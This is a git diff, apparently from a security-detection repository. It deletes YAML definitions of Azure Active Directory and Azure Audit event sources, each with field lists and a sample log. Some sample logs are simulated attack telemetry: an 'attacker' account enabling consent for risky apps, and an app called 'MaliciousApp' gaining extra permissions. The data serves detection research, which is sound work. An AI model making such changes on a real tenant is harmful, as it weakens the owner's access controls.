"oops360_gmail.com#EXT#@strtadminsplunkresearch.onmicrosoft.com", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "oid", "value": "728989f4-eb3d-45c2-8741-2f2af4e485ce"}, {"key": "tid", "value": "fc69e276-e9e8-4af9-9002-1e410d77244e"}, {"key": "ipaddr", "value": "2601:646:a000:200:c4db:f288:7e28:21b3"}, {"key": "wids", "value": "62e90394-69f5-4237-9190-012177145e10"}, {"key": "InvitationId", "value": "65c7d12f-c6f3-44f0-8fad-4f57a1020484"}, {"key": "invitedUserEmailAddress", "value": "oops360@gmail.com"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml
deleted file mode 100644
index 1abaf67249..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Reset password (by admin)
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-24T14:28:55.0648789Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Reset password (by admin)", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "resultDescription": "None", "durationMs": 0, "callerIpAddress": "40.81.4.144", "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "Level": 4, "properties": {"id": "SSPR_724ff6ae-0f36-4f2f-a20f-f043e0c73006_P1CQE_8605821", "category": "UserManagement", "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "result": "success", "resultReason": "None", "activityDisplayName": "Reset password (by admin)", "activityDateTime": "2023-07-24T14:28:55.0648789+00:00", "loggedByService": "Self-service Password Management", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "40.81.4.144", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": "test", "type": "User", "userPrincipalName": "testuser@splunkresearch.com", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "OnPremisesAgent", "value": "None"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml
deleted file mode 100644
index 58de93e431..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Set domain authentication
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-26T13:44:59.0372448Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Set domain authentication", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4", "Level": 4, "properties": {"id": "Directory_57e60ecc-17b8-4ab5-815e-d538e1ca32a4_XDHHZ_434456733", "category": "DirectoryManagement", "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4", "result": "success", "resultReason": "", "activityDisplayName": "Add unverified domain", "activityDateTime": "2023-07-26T13:44:59.0372448+00:00", "loggedByService": "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com", "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue": "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue": "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml
deleted file mode 100644
index 22b9688968..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml
+++ /dev/null
@@ -1,103 +0,0 @@
-event_name: Azure Active Directory Sign-in activity
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- identity
-- index
-- linecount
-- location
-- operationName
-- operationVersion
-- properties.alternateSignInName
-- properties.appDisplayName
-- properties.appId
-- properties.appServicePrincipalId
-- properties.authenticationDetails{}.RequestSequence
-- properties.authenticationDetails{}.StatusSequence
-- properties.authenticationDetails{}.authenticationMethod
-- properties.authenticationDetails{}.authenticationMethodDetail
-- properties.authenticationDetails{}.authenticationStepDateTime
-- properties.authenticationDetails{}.authenticationStepRequirement
-- properties.authenticationDetails{}.authenticationStepResultDetail
-- properties.authenticationDetails{}.succeeded
-- properties.authenticationProcessingDetails{}.key
-- properties.authenticationProcessingDetails{}.value
-- properties.authenticationProtocol
-- properties.authenticationRequirement
-- properties.authenticationRequirementPolicies{}.detail
-- properties.authenticationRequirementPolicies{}.requirementProvider
-- properties.autonomousSystemNumber
-- properties.clientAppUsed
-- properties.clientCredentialType
-- properties.conditionalAccessStatus
-- properties.correlationId
-- properties.createdDateTime
-- properties.crossTenantAccessType
-- properties.deviceDetail.deviceId
-- properties.deviceDetail.operatingSystem
-- properties.flaggedForReview
-- properties.homeTenantId
-- properties.id
-- properties.incomingTokenType
-- properties.ipAddress
-- properties.isInteractive
-- properties.isTenantRestricted
-- properties.location.city
-- properties.location.countryOrRegion
-- properties.location.geoCoordinates.latitude
-- properties.location.geoCoordinates.longitude
-- properties.location.state
-- properties.originalRequestId
-- properties.originalTransferMethod
-- properties.processingTimeInMilliseconds
-- properties.resourceDisplayName
-- properties.resourceId
-- properties.resourceServicePrincipalId
-- properties.resourceTenantId
-- properties.riskDetail
-- properties.riskLevelAggregated
-- properties.riskLevelDuringSignIn
-- properties.riskState
-- properties.rngcStatus
-- properties.servicePrincipalId
-- properties.signInIdentifier
-- properties.signInTokenProtectionStatus
-- properties.ssoExtensionVersion
-- properties.status.additionalDetails
-- properties.status.errorCode
-- properties.status.failureReason
-- properties.tenantId
-- properties.tokenIssuerName
-- properties.tokenIssuerType
-- properties.uniqueTokenIdentifier
-- properties.userAgent
-- properties.userDisplayName
-- properties.userId
-- properties.userPrincipalName
-- properties.userType
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- resultType
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-10-24T20:13:31.4449614Z", "resourceId": "/tenants/887c9144-28b8-431b-885b-764fdeefcf62/providers/Microsoft.aadiam", "operationName": "Sign-in activity", "operationVersion": "1.0", "category": "SignInLogs", "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "resultType": "50076", "resultSignature": "None", "resultDescription": "Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access the resource.", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId": "1f577997-0710-4bd4-848e-5854f748f7dc", "identity": "user15", "Level": 4, "location": "US", "properties": {"id": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "createdDateTime": "2023-10-24T20:01:11.9490387+00:00", "userDisplayName": "user15", "userPrincipalName": "user15@splunkresearch.onmicrosoft.com", "userId": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "appId": "1b730954-1685-4b74-9bfd-dac224a7b894", "appDisplayName": "Azure Active Directory PowerShell", "ipAddress": "1.2.3.4", "status": {"errorCode": 50076, "failureReason": "Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access the resource.", "additionalDetails": "MFA required in Azure AD"}, "clientAppUsed": "Mobile Apps and Desktop clients", "userAgent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.2428", "deviceDetail": {"deviceId": "", "operatingSystem": "Windows"}, "location": {"city": "Rochester", "state": "New York", "countryOrRegion": "US", "geoCoordinates": {"latitude": 20.756160123483984, "longitude": -73.99697875976562}}, "mfaDetail": {}, "correlationId": "1f577997-0710-4bd4-848e-5854f748f7dc", "conditionalAccessStatus": "notApplied", "appliedConditionalAccessPolicies": [], "authenticationContextClassReferences": [], "originalRequestId": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "isInteractive": true, "tokenIssuerName": "", "tokenIssuerType": "AzureAD", "authenticationProcessingDetails": [{"key": "Legacy TLS (TLS 1.0, 1.1, 3DES)", "value": "False"}, {"key": "Is CAE Token", "value": "False"}], "networkLocationDetails": [], "clientCredentialType": "none", "processingTimeInMilliseconds": 72, "riskDetail": "none", "riskLevelAggregated": "none", "riskLevelDuringSignIn": "none", "riskState": "none", "riskEventTypes": [], "riskEventTypes_v2": [], "resourceDisplayName": "Windows Azure Active Directory", "resourceId": "00000002-0000-0000-c000-000000000000", "resourceTenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "homeTenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "authenticationDetails": [{"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00", "authenticationMethod": "Password", "authenticationMethodDetail": "Password in the cloud", "succeeded": true, "authenticationStepResultDetail": "Correct password", "authenticationStepRequirement": "Primary authentication", "StatusSequence": 0, "RequestSequence": 1}, {"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00", "succeeded": false, "authenticationStepResultDetail": "MFA required in Azure AD", "authenticationStepRequirement": "Primary authentication"}], "authenticationRequirementPolicies": [{"requirementProvider": "user", "detail": "Per-user MFA"}], "sessionLifetimePolicies": [], "authenticationRequirement": "multiFactorAuthentication", "alternateSignInName": "user15@splunkresearch.onmicrosoft.com", "signInIdentifier": "user15@splunkresearch.onmicrosoft.com", "servicePrincipalId": "", "userType": "Member", "flaggedForReview": false, "isTenantRestricted": false, "autonomousSystemNumber": 12271, "crossTenantAccessType": "none", "privateLinkDetails": {}, "ssoExtensionVersion": "", "uniqueTokenIdentifier": "JYpgIpsdtUSw8suU8GstAA", "authenticationStrengths": [], "incomingTokenType": "none", "authenticationProtocol": "ropc", "appServicePrincipalId": null, "resourceServicePrincipalId": "56ad242f-e13b-47fc-8de8-19e3bf6f6575", "rngcStatus": 0, "signInTokenProtectionStatus": "none", "originalTransferMethod": "none"}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml
deleted file mode 100644
index 3609e89c9c..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Update application
-fields:
-- _time
-- Level
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2024-01-29T21:31:03.0102031Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam", "operationName": "Update application", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "durationMs": 0, "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3", "Level": 4, "properties": {"id": "Directory_a5396d2b-fcf6-41e7-9219-c6239f1298e3_DGBDP_1548236", "category": "ApplicationManagement", "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3", "result": "success", "resultReason": "", "activityDisplayName": "Update application", "activityDateTime": "2024-01-29T21:31:03.0102031+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName": "user30@splunkresearch.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id": "75924835-d844-4947-96ba-18074e997386", "displayName": "MaliciousApp", "type": "Application", "modifiedProperties": [{"displayName": "RequiredResourceAccess", "oldValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]", "newValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1},{\"ResourceAppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"RequiredResourceAccess\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "867f0d29-0eab-4017-b691-c4713cc7d7b0"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml
deleted file mode 100644
index 8c21799ee1..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml
+++ /dev/null
@@ -1,54 +0,0 @@
-event_name: Azure Active Directory Update authorization policy
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-10-26T19:22:20.2814027Z", "resourceId": "/tenants/5f210575-a69b-41a7-b623-3f6d79ccd432/providers/Microsoft.aadiam", "operationName": "Update authorization policy", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "5f210575-a69b-41a7-b623-3f6d79ccd432", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065", "Level": 4, "properties": {"id": "Directory_cc46d719-4c0f-4b78-8795-b0d6ca5b2065_6CH7M_196574953", "category": "AuthorizationPolicy", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065", "result": "success", "resultReason": "", "activityDisplayName": "Update authorization policy", "activityDateTime": "2023-10-26T19:22:20.2814027+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName": "attacker@splunkresearch.onmicrosoft.com", "ipAddress": "1.2.3.4", "roles": []}}, "targetResources": [{"id": "24484114-1daa-4700-aaf7-44ee5cbe5678", "displayName": "Authorization Policy", "type": "Other", "modifiedProperties": [{"displayName": "AllowUserConsentForRiskyApps", "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "PermissionGrantPolicyIdsAssignedToDefaultUserRole", "oldValue": "[\"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"]", "newValue": "[\"microsoft-user-default-legacy\"]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AllowUserConsentForRiskyApps, PermissionGrantPolicyIdsAssignedToDefaultUserRole\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Swagger-Codegen/1.0.0.0/csharp/msal"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml
deleted file mode 100644
index 1c1b1aac34..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml
+++ /dev/null
@@ -1,55 +0,0 @@
-event_name: Azure Active Directory Update user
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-24T14:28:15.2233481Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Update user", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413199", "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "result": "success", "resultReason": "", "activityDisplayName": "Update user", "activityDateTime": "2023-07-24T14:28:15.2233481+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": null, "type": "User", "userPrincipalName": "testuser@splunkresearch.com", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled\""}, {"displayName": "TargetId.UserType", "oldValue": null, "newValue": "\"Member\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "UserType", "value": "Member"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml
deleted file mode 100644
index 0b45453a39..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml
+++ /dev/null
@@ -1,51 +0,0 @@
-event_name: Azure Active Directory User registered security info
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-01-30T21:11:30.8690619Z", "resourceId": "/tenants/91da745f-8abb-4a7d-ba94-5667c6f9e01a/providers/Microsoft.aadiam", "operationName": "User registered security info", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "91da745f-8abb-4a7d-ba94-5667c6f9e01a", "resultSignature": "None", "resultDescription": "User registered App Password", "durationMs": 0, "callerIpAddress": "72.1.2.43", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79", "Level": 4, "properties": {"id": "IAMUX_14279c94-7ebc-409f-be4e-7861f13c8a79_K2ATV_323947358", "category": "UserManagement", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79", "result": "success", "resultReason": "User registered App Password", "activityDisplayName": "User registered security info", "activityDateTime": "2023-01-30T21:11:30.8690619+00:00", "loggedByService": "Authentication Methods", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "displayName": null, "userPrincipalName": "User30@splunkresearch.com", "ipAddress": "72.1.2.43", "roles": []}}, "targetResources": [{"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "displayName": "User30", "type": "User", "userPrincipalName": "User30@splunkresearch.com", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml b/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml
deleted file mode 100644
index 24f228f7f3..0000000000
--- a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Azure Audit Create or Update an Azure Automation Runbook
-fields:
-- _time
-- authorization.action
-- authorization.scope
-- caller
-- channels
-- claims.aio
-- claims.altsecid
-- claims.appid
-- claims.appidacr
-- claims.aud
-- claims.exp
-- claims.groups
-- claims.http://schemas.microsoft.com/claims/authnclassreference
-- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
-- claims.http://schemas.microsoft.com/identity/claims/identityprovider
-- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
-- claims.http://schemas.microsoft.com/identity/claims/scope
-- claims.http://schemas.microsoft.com/identity/claims/tenantid
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
-- claims.iat
-- claims.ipaddr
-- claims.iss
-- claims.name
-- claims.nbf
-- claims.puid
-- claims.rh
-- claims.uti
-- claims.ver
-- claims.wids
-- claims.xms_tcdt
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- eventDataId
-- eventName.localizedValue
-- eventName.value
-- eventSource.localizedValue
-- eventSource.value
-- eventTimestamp
-- host
-- id
-- index
-- level
-- linecount
-- object
-- object_id
-- object_path
-- operationId
-- operationName.localizedValue
-- operationName.value
-- product
-- properties.entity
-- properties.eventCategory
-- properties.hierarchy
-- properties.message
-- punct
-- resourceGroupName
-- resourceProviderName.localizedValue
-- resourceProviderName.value
-- resourceUri
-- source
-- sourcetype
-- splunk_server
-- status
-- status.localizedValue
-- status.value
-- subStatus.value
-- submissionTimestamp
-- subscriptionId
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-- vendor_res_code
